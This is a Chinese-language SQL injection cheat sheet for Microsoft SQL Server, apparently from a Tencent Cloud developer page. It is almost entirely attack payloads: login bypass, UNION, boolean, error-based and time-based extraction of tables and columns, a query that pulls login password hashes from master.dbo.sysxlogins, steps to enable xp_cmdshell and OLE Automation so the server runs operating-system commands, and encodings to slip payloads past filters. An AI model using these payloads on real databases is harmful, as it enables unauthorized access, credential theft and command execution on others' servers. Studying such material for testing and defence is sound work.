数据库的一些注入技巧-sqlserver
默认数据库
pubs | MSSQL 2005版本以上不支持 |
|---|---|
model | 支持所有版本 |
msdb | 支持所有版本 |
tempdb | 支持所有版本 |
northwind | 支持所有版本 |
information_schema | 支持MSSQL 2000及以上版本 |
注释
/* |
|---|
-- |
;%00 |
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password ='';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
查询版本信息
@@VERSION
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';
查询数据库凭证
Database..Table | master..syslogins, master..sysprocesses |
|---|---|
Columns | name, loginame |
Current User | user, system_user, suser_sname(), is_srvrolemember('sysadmin') |
Database Credentials | SELECT user, password FROM master.dbo.sysxlogins |
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);
查询数据库信息
Database.Table | master..sysdatabases |
|---|---|
Column | name |
Current DB | DB_NAME(i) |
· SELECT DB_NAME(5);
· SELECT name FROM master..sysdatabases;
查询主机名称
@@SERVERNAME |
|---|
SERVERPROPERTY() |
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');
查询表和列
确定列数
ORDER BY n+1;
漏洞语句:
SELECT username, password, permission FROM UsersWHERE id = '1';
查询列数如下:
1' ORDER BY 1-- | True |
|---|---|
1' ORDER BY 2-- | True |
1' ORDER BY 3-- | True |
1' ORDER BY 4-- | False - Query is only using 3 columns |
-1' UNION SELECT 1,2,3-- | True |
查询列
GROUP BY / HAVING
漏洞语句:
SELECT username,password, permission FROM Users WHERE id = '1';
注入语句:
1' HAVING 1=1-- | Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
|---|---|
1' GROUP BY username HAVING 1=1-- | Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
1' GROUP BY username, password HAVING 1=1-- | Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. |
1' GROUP BY username, password, permission HAVING 1=1-- | No Error |
查询表
从以下两个数据库中查询表信息:
information_schema.tables、master..sysobjects
联合查询
UNION SELECT name FROM master..sysobjects WHERE xtype='U' |
|---|
布尔查询
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' |
|---|
报错查询
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables) |
|---|
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables)) |
查询列
从以下两个数据库中查询表信息:
information_schema.columns 、 masters..syscolumns
联合查询
UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')
布尔查询
AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'
报错查询
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns) |
|---|
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)) |
检索多个表/列
1、
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
2、
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);
3、
AND 1=0; DROP TABLE TMP_DB;
SQL Server 2005版本以上适用
SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('') |
|---|
储存过程查询:
' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
避免单引号
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) |
|---|
字符串拼接
SELECT CONCAT('a','a','a'); (SQL SERVER 2012) |
|---|
SELECT 'a'+'d'+'mi'+'n'; |
条件判断
IF |
|---|
CASE |
IF 1=1 SELECT'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;
时间注入
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';
执行命令
EXEC master.dbo.xp_cmdshell 'cmd';
mssql 2005默认禁用xp_cmdshell,用以下语句开启:
EXEC sp_configure 'show advanced options', 1 |
|---|
EXEC sp_configure reconfigure |
EXEC sp_configure 'xp_cmdshell', 1 |
EXEC sp_configure reconfigure |
调用wscript执行命令:
DECLARE @execmd INT |
|---|
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT |
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c echo jumbo' |
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:
EXEC sp_configure 'show advanced options', 1 |
|---|
EXEC sp_configure reconfigure |
EXEC sp_configure 'OLE Automation Procedures', 1 |
EXEC sp_configure reconfigure |
例:
1、把命令结果存入tmp_db
' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
2、从tmp_db查询内容:
' UNION SELECT tbl FROM TMP_DB--
3、删除tmp_db
' DROP TABLE TMP_DB--
多语句查询
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');
混淆
以下字符等同于空
01 |
|---|
02 |
03 |
04 |
05 |
06 |
07 |
08 |
09 |
0A |
0B |
0C |
0D |
0E |
0F |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
1A |
1B |
1C |
1D |
1E |
1F |
20 |
25 |
S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
%仅限于ASP(x)环境
以下字符代替空格
22 | " |
|---|---|
28 | ( |
29 | ) |
5B | [ |
5D | ] |
UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];
and/or之后可以使用的符号
01 - 20 | Range |
|---|---|
21 | ! |
2B | + |
2D | - |
2E | . |
5C | \ |
7E | ~ |
SELECT 1FROM[table]WHERE\1=\1AND\1=\1;
编码
URL Encoding | SELECT %74able_%6eame FROM information_schema.tables; |
|---|---|
Double URL Encoding | SELECT %2574able_%256eame FROM information_schema.tables; |
Unicode Encoding | SELECT %u0074able_%u6eame FROM information_schema.tables; |
Invalid Hex Encoding (ASP) | SELECT %tab%le_%na%me FROM information_schema.tables; |
Hex Encoding | ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);-- |
HTML Entities (Needs to be verified) | %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B |
腾讯云开发者
